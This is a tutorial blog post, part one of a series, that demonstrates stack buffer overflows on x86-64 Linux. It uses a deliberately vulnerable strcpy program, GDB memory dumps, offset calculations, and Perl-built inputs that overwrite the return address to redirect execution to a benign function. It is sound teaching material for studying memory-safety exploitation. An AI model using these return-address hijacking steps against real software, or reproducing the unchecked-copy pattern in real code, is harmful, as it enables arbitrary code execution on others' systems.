On Stack Smashing, Part One

Stack smashing means corrupting the call stack of a running process, typically to inject executable code or take control of the instruction pointer, so that the process does something it wasn’t designed to do. This is usually accomplished with a stack-based buffer overflow, or overrun, whereby a contiguous area of memory is filled up and the write spills over into the adjacent memory locations.

When the attacker gets to choose what runs next, the result is known as arbitrary code execution.

There have been security measures put in place both at the hardware (NX bit) and software (ASLR, stack canaries) layers to prevent these, but any subscriber to an OS bug mailing list will know that these exploits still happen frequently.

I posit that taking the time to understand how and why these exploits work is an excellent educational experience, whether one codes in a “low-level” language such as C/C++ or a high-level interpreted language such as Python or JavaScript.

For example, to implement a buffer overflow attack, it is necessary to have at least a basic understanding of the following (in no specific order):

memory layout
assembly
C
GDB

In this article, I’m going to assume a certain familiarity with the basics of the aforementioned, so if you are completely new to any one of them, I suggest finding a tutorial to get you up to speed.

Let’s get started.

Stack-based Buffer Overflow Example

Here’s a simple and contrived example, which is close to the canonical example you’ll see on most websites that demonstrate the technique:

#include <stdio.h>
#include <string.h>

void foo(char *s) {
    char buf[10];
    strcpy(buf, s);
    printf("%s\n", buf);
}

int main(int argc, char **argv) {
    foo(argv[1]);
    return 0;
}

The idea is to give the program input that is larger than the length that the buf buffer expects. By overwriting adjacent memory, a clever hacker can gain control of the process and possibly even the machine.

For example, since there is no bounds checking, the call to strcpy will overflow the buf buffer if the character array that s points to, including its terminating null byte, is larger than 10 bytes. Let’s test it.

The strcpy man page warns that the function is susceptible to a buffer overrun and that the recommended function call is strncpy, where the programmer specifies the length of the copy.

$ gcc -o cat_pictures cat_pictures.c
$ ./cat_pictures foobar
foobar
$ ./cat_pictures AAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)

You can see that the character array foobar, being six bytes in length, is printed to stdout without a complaint. The second example, however, is a different story. The “string” (there are no strings in C) is larger than the buffer, and C will continue to happily write the characters into the adjacent memory, corrupting it and causing a runtime error.

Let’s compile cat_pictures.c again with a flag that turns off the compiler’s stack protection:

$ gcc -fno-stack-protector -o cat_pictures cat_pictures.c
$ ./cat_pictures AAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

We now just get a segfault. That’s better.

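The stack smashing detected error appears because GCC on my 64-bit x86 Linux machine enables its stack protector by default. The protector places a canary value between a function’s local buffers and its saved return address, and aborts the program if that value has changed by the time the function returns. You may not need the -fno-stack-protector flag when compiling on a 32-bit machine, but that depends on how your distribution configures GCC rather than on the architecture itself.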

So, what is happening here? Let’s recompile for debugger symbol support and run it in a GDB session:

$ gcc -ggdb3 -fno-stack-protector -o cat_pictures cat_pictures.c
$ gdb cat_pictures
Reading symbols from cat_pictures...done.
(gdb) l 1
1       #include <stdio.h>
2       #include <string.h>
3
4       void foo(char *s) {
5           char buf[10];
6           strcpy(buf, s);
7           printf("%s\n", buf);
8       }
9
10      int main(int argc, char **argv) {
(gdb)
11          foo(argv[1]);
12          return 0;
13      }
14
(gdb) b 5
Breakpoint 1 at 0x1151: file cat_pictures.c, line 6.
(gdb) b 7
Breakpoint 2 at 0x1164: file cat_pictures.c, line 7.
(gdb) r foobar
Starting program: /home/btoll/cat_pictures foobar

Breakpoint 1, foo (s=0x7fffffffe304 "foobar") at cat_pictures.c:6
6           strcpy(buf, s);
(gdb)

Ok, here I’ve listed the program, set two breakpoints (one before the character array is copied into the buffer and one after) and ran the program with the parameter “foobar”.

Let’s look at the memory layout. I’ll dump the first 16 words (64 bytes) starting from the stack pointer. This displays the memory from the top of the stack towards the higher memory addresses. I know, that’s confusing and unintuitive, but on x86 the stack grows down towards lower addresses, so the “top” of the stack is its lowest address:

(gdb) x/16xw $rsp
0x7fffffffde40: 0x00000000      0x00000000      0xffffe303      0x00007fff
0x7fffffffde50: 0xf7fe39b0      0x00007fff      0x00000000      0x00000000
0x7fffffffde60: 0xffffde80      0x00007fff      0x55555195      0x00005555
0x7fffffffde70: 0xffffdf68      0x00007fff      0x00000000      0x00000002
(gdb)

Where is the base pointer pointing?

(gdb) x $rbp
0x7fffffffde60: 0xffffde80
(gdb)

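On 64-bit Linux, the calling convention passes the first few function arguments in CPU registers rather than on the stack. The first argument travels in rdi, but main staged it in rax just before the call (see the disassembly of main further down), so we can still find ours in the rax register: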

(gdb) x/s $rax
0x7fffffffe304: "foobar"
(gdb)

And the location and value of buf:

(gdb) x buf
0x7fffffffde56: 0x00000000
(gdb) x/s buf
0x7fffffffde56: ""
(gdb)

The compiler allocated 10 bytes for the buffer:

(gdb) p $rbp-buf
$1 = 10
(gdb)

Let’s look again at this block of memory and pick out the important bytes:

(gdb) x/16xw $rsp
0x7fffffffde40: 0x00000000      0x00000000      0xffffe303      0x00007fff
0x7fffffffde50: 0xf7fe39b0      0x00007fff      0x00000000      0x00000000
0x7fffffffde60: 0xffffde80      0x00007fff      0x55555195      0x00005555
0x7fffffffde70: 0xffffdf68      0x00007fff      0x00000000      0x00000002
(gdb)

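stack pointer (rsp) - 0x7fffffffde40, the first word of the dump
base pointer (rbp) - 0x7fffffffde60, which holds the saved base pointer 0x00007fffffffde80
return address - 0x7fffffffde68, which holds 0x0000555555555195
buf local variable - the 10 bytes from 0x7fffffffde56 to 0x7fffffffde5f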

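The 22 bytes between the stack pointer and buf can be ignored here (eight of them, at 0x7fffffffde48, hold foo’s copy of the s pointer), and the word 0x00007fff that follows 0xffffde80 is simply the upper half of the 8-byte saved base pointer.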

See my post On Debugging with GDB if you’re confused about any of this.

How do I know that the value stored at address 0x7fffffffde68 is the return address? I simply disassembled the main function and looked at the address of the instruction right after the call to foo (0x0000555555555195), which the call instruction pushes onto the stack before foo’s prologue runs, making it part of the new stack frame:

(gdb) disass main
Dump of assembler code for function main:
   0x0000555555555173 <+0>:     push   rbp
   0x0000555555555174 <+1>:     mov    rbp,rsp
   0x0000555555555177 <+4>:     sub    rsp,0x10
   0x000055555555517b <+8>:     mov    DWORD PTR [rbp-0x4],edi
   0x000055555555517e <+11>:    mov    QWORD PTR [rbp-0x10],rsi
   0x0000555555555182 <+15>:    mov    rax,QWORD PTR [rbp-0x10]
   0x0000555555555186 <+19>:    add    rax,0x8
   0x000055555555518a <+23>:    mov    rax,QWORD PTR [rax]
   0x000055555555518d <+26>:    mov    rdi,rax
   0x0000555555555190 <+29>:    call   0x555555555145 <foo>
   0x0000555555555195 <+34>:    mov    eax,0x0
   0x000055555555519a <+39>:    leave
   0x000055555555519b <+40>:    ret
End of assembler dump.
(gdb)

Now, let’s continue onto the second breakpoint:

(gdb) c
Continuing.

Breakpoint 2, foo (s=0x7fffffffe303 "foobar") at cat_pictures.c:7
7           printf("%s\n", buf);
(gdb)

Now that our buffer has been copied into, we’ll inspect the same block of memory again and let the program run to completion:

(gdb) x/s buf
0x7fffffffde56: "foobar"
(gdb) x/16xw $rsp
0x7fffffffde40: 0x00000000      0x00000000      0xffffe303      0x00007fff
0x7fffffffde50: 0xf7fe39b0      0x6f667fff      0x7261626f      0x00000000
0x7fffffffde60: 0xffffde80      0x00007fff      0x55555195      0x00005555
0x7fffffffde70: 0xffffdf68      0x00007fff      0x00000000      0x00000002
(gdb) c
Continuing.
foobar
[Inferior 1 (process 26468) exited normally]
(gdb)

The zero byte right after 0x7261626f (“obar” read as a little-endian word), at address 0x7fffffffde5c, is the null byte added by strcpy. Essentially, “foobar” + “\0”.

Ok, now let’s make it more interesting by attempting to copy in more than 10 bytes:

(gdb) r AAAAAAAAAAAAAAAAA
Starting program: /home/btoll/cat_pictures AAAAAAAAAAAAAAAAA

Breakpoint 1, foo (s=0x7fffffffe2f8 'A' <repeats 17 times>) at cat_pictures.c:6
6           strcpy(buf, s);
(gdb) c
Continuing.

Breakpoint 2, foo (s=0x7fffffffe2f8 'A' <repeats 17 times>) at cat_pictures.c:7
7           printf("%s\n", buf);
(gdb) x/16xw $rsp
0x7fffffffde30: 0x00000000      0x00000000      0xffffe2f8      0x00007fff
0x7fffffffde40: 0xf7fe39b0      0x41417fff      0x41414141      0x41414141
0x7fffffffde50: 0x41414141      0x00414141      0x55555195      0x00005555
0x7fffffffde60: 0xffffdf58      0x00007fff      0x00000000      0x00000002
(gdb) i r rbp
rbp            0x7fffffffde50      0x7fffffffde50
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAA

Program received signal SIGBUS, Bus error.
main (argc=, argv=) at cat_pictures.c:13
13      }
(gdb)

After continuing to the second breakpoint, we can see that we’ve overrun the size of our buffer and spilled into the adjacent memory. The program prints, but is unable to exit gracefully.

Notice, however, that we haven’t actually overwritten the return address, which is the objective of a buffer overflow exploit: 0x55555195 0x00005555 is still intact in the dump, and only the saved base pointer in front of it was clobbered. To reach the return address, we’d need to run the program with a longer input “string”. But how long?

Well, from our previous testing, we know that buf starts at address 0x7fffffffde56 and the return address starts at address 0x7fffffffde68. So:

(gdb) p 0x7fffffffde68-0x7fffffffde56
$2 = 18
(gdb)

Let’s try it with a buffer length of 18 bytes and clear the first breakpoint:

(gdb) r $(perl -e 'print "A"x18')
Starting program: /home/btoll/cat_pictures $(perl -e 'print "A"x18')

Breakpoint 1, foo (s=0x7fffffffe2f7 'A' <repeats 18 times>) at cat_pictures.c:6
6           strcpy(buf, s);
(gdb) clear
Deleted breakpoint 1
(gdb) c
Continuing.

Breakpoint 2, foo (s=0x7fffffffe2f7 'A' <repeats 18 times>) at cat_pictures.c:7
7           printf("%s\n", buf);
(gdb) x/16xw $rsp
0x7fffffffde30: 0x00000000      0x00000000      0xffffe2f7      0x00007fff
0x7fffffffde40: 0xf7fe39b0      0x41417fff      0x41414141      0x41414141
0x7fffffffde50: 0x41414141      0x41414141      0x55555100      0x00005555
0x7fffffffde60: 0xffffdf58      0x00007fff      0x00000000      0x00000002
(gdb)

Wait a minute, what happened to the return address? We gave it a character array of 18 bytes, which should end right up against the return address and leave its value of 0x55555195 untouched (again, that’s the location of the next instruction in main after the call to foo). Instead, it now reads 0x55555100. Wtf?

Again, recall that any character array must end with a null byte. strcpy will automatically add that null byte when it copies from source to destination buffer. If we look closer, we see that that’s exactly what happened: the 18 bytes + the 1 null byte.

So, we just need to add another 4 bytes to cover the low four bytes of the return address:

(gdb) r $(perl -e 'print "A"x22')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/btoll/cat_pictures $(perl -e 'print "A"x22')

Breakpoint 2, foo (s=0x7fffffffe2f3 'A' <repeats 22 times>) at cat_pictures.c:7
7           printf("%s\n", buf);
(gdb) x/16xw $rsp
0x7fffffffde30: 0x00000000      0x00000000      0xffffe2f3      0x00007fff
0x7fffffffde40: 0xf7fe39b0      0x41417fff      0x41414141      0x41414141
0x7fffffffde50: 0x41414141      0x41414141      0x41414141      0x00005500
0x7fffffffde60: 0xffffdf58      0x00007fff      0x00000000      0x00000002
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000550041414141 in ?? ()
(gdb)

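Now that we’ve increased our input size, we can see that it overflows into the return address: the low four bytes are now 0x41414141, the null terminator lands on the fifth byte, and the process tries to jump to 0x0000550041414141.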

Let’s now look at preparing an exploit that will actually do something, instead of just crashing the program.

By the way, why am I using Perl? Obviously, you can use any programming language you like that’s installed on the machine, but most Linux distros will have Perl installed by default, and there are environments where it could be the only scripting language installed. Deal with it.

Controlling the Return Address

Now that we’ve seen how to overflow a buffer through to the return address, let’s actually have it do something (somewhat) interesting. Let’s create a new function, and instead of having the program call it directly, we’ll call it indirectly by overwriting the return address with the function’s memory address.

First, we’ll create some “shell code” (really just a hex-escaped string for the new function to print):

$ echo and now you do what they told ya | hexdump -v -e '"\\x" 1/1 "%02x"' ; echo

Note that there isn’t anything malicious here; it’s just encoding the string “and now you do what they told ya”, plus the newline that echo appends, into hex escapes. The -e flag allows us to pass a format string to hexdump, and the trailing echo simply ends the output with a newline.

The output:

\x61\x6e\x64\x20\x6e\x6f\x77\x20\x79\x6f\x75\x20\x64\x6f\x20\x77\x68\x61\x74\x20\x74\x68\x65\x79\x20\x74\x6f\x6c\x64\x20\x79\x61\x0a

And the updated cat_pictures.c program:

#include <stdio.h>
#include <string.h>

void ratm() {
    printf("\x61\x6e\x64\x20\x6e\x6f\x77\x20\x79\x6f\x75\x20\x64\x6f\x20\x77\x68\x61\x74\x20\x74\x68\x65\x79\x20\x74\x6f\x6c\x64\x20\x79\x61\x0a");
}

void foo(char *s) {
    char buf[10];
    strcpy(buf, s);
    printf("%s\n", buf);
}

int main(int argc, char **argv) {
    foo(argv[1]);
    return 0;
}

Recompile and run the program in GDB, breaking at the beginning of the main function. This will allow us to determine the address of the new ratm function:

$ gdb cat_pictures
Reading symbols from cat_pictures...done.
(gdb) b main
Breakpoint 1 at 0x1195: file cat_pictures.c, line 15.
(gdb) r
Starting program: /home/btoll/cat_pictures

Breakpoint 1, main (argc=1, argv=0x7fffffffdf78) at cat_pictures.c:15
15          foo(argv[1]);
(gdb) x ratm
0x555555555145 <ratm>:  0xe5894855
(gdb)

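Append the address 0x555555555145 to our input and call the program again (this time from the command line). The bytes go in little-endian order, least significant first, and only the six non-zero bytes are needed: strcpy’s null terminator zeroes the seventh, and the eighth is already zero. Bear in mind that this only works outside GDB if the program is loaded at the same address there, which generally means address space layout randomization is turned off: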

$ ./cat_pictures $(perl -e 'print "A"x18 . "\x45\x51\x55\x55\x55\x55"')
AAAAAAAAAAAAAAAAAAEQUUUU
and now you do what they told ya
Segmentation fault (core dumped)

Works. Weeeeeeeeeeeeeeeeeeeeeeeee

Let’s look at another example. The dog_adoption.c program is also contrived, but it illuminates further how the return address can be controlled to do clever things. Here, a pointer is used to replace the return address with one that skips over the rest of the if block in main and allows us to adopt another dog:

dog_adoption.c

#include <stdio.h>

int adoption() {
    int current = 4;
    int *ret;

    ret = &current + 5;     /* [1] */
    *ret += 24;             /* [2] */

    return current;
}

int main() {
    if (adoption() > 2) {
        printf("i'm sorry, you cannot get another dog\n");
        return 0;
    }

    printf("get another dog\n");
}

[1] Pointer arithmetic to “forward” the pointer from current to the location of the return address.

This is accomplished by inspecting the memory addresses of adoption’s local variables. For example:

  (gdb) x/16xw $rbp-48
  0x7fffffffde10: 0x00000000      0x00000000      0x555551e5      0x00005555
  0x7fffffffde20: 0xf7fe39b0      0x00007fff      0x00000000      0x00000000
  0x7fffffffde30: 0x555551a0      0x00000004      0xffffde48      0x00007fff
  0x7fffffffde40: 0xffffde50      0x00007fff      0x55555186      0x00005555
  (gdb) x/xw &current
  0x7fffffffde34: 0x00000004
  (gdb) x/xw &ret
  0x7fffffffde38: 0xffffde48
  (gdb) x/xw $rbp
  0x7fffffffde40: 0xffffde50
  (gdb)

Here, we’re dumping 64 bytes starting 48 bytes below the base pointer. adoption doesn’t call any other function, and the x86-64 System V ABI lets such leaf functions use the 128-byte “red zone” below the stack pointer without adjusting rsp, so that’s why I’m not dumping the memory using rsp as the starting point as before.

The return address is located at address 0x7fffffffde48, so we simply find the difference between its address and that of current and divide by 4, since we’re dealing with ints:
```
  (gdb) p (0x7fffffffde48-0x7fffffffde34) / sizeof(int)
  $3 = 5
  (gdb)
```

[2] After disassembling main, add to the return address the number of bytes between the instruction it originally points at and the instruction we want to execute, jumping over the ones we don’t.

We’ll disassemble main and again do some basic arithmetic:

  (gdb) disass main
  Dump of assembler code for function main:
     0x0000555555555160 <+0>:     push   rbp
     0x0000555555555161 <+1>:     mov    rbp,rsp
     0x0000555555555164 <+4>:     mov    eax,0x0
     0x0000555555555169 <+9>:     call   0x555555555135 <adoption>
     0x000055555555516e <+14>:    cmp    eax,0x2
     0x0000555555555171 <+17>:    jle    0x555555555186 <main+38>
     0x0000555555555173 <+19>:    lea    rdi,[rip+0xe8e]        # 0x555555556008
     0x000055555555517a <+26>:    call   0x555555555030 <puts@plt>
     0x000055555555517f <+31>:    mov    eax,0x0
     0x0000555555555184 <+36>:    jmp    0x555555555197 <main+55>
     0x0000555555555186 <+38>:    lea    rdi,[rip+0xea1]        # 0x55555555602e
     0x000055555555518d <+45>:    call   0x555555555030 <puts@plt>
     0x0000555555555192 <+50>:    mov    eax,0x0
     0x0000555555555197 <+55>:    pop    rbp
     0x0000555555555198 <+56>:    ret
  End of assembler dump.
  (gdb) p 0x0000555555555186-0x000055555555516e
  $12 = 24
  (gdb)

Again, here we’re just finding the difference between the address we want to jump to (main+38) and the original return address (main+14, the instruction right after the call to adoption).

Back on the command line, we’ll see if it worked:

$ ./dog_adoption
get another dog

Kool moe dee.

Conclusion

This post is getting rather long, so I’m going to break it up into two pieces.

In the second half, I’ll be showing how to exploit the cat_pictures.c program in a more useful, albeit somewhat contrived, way.
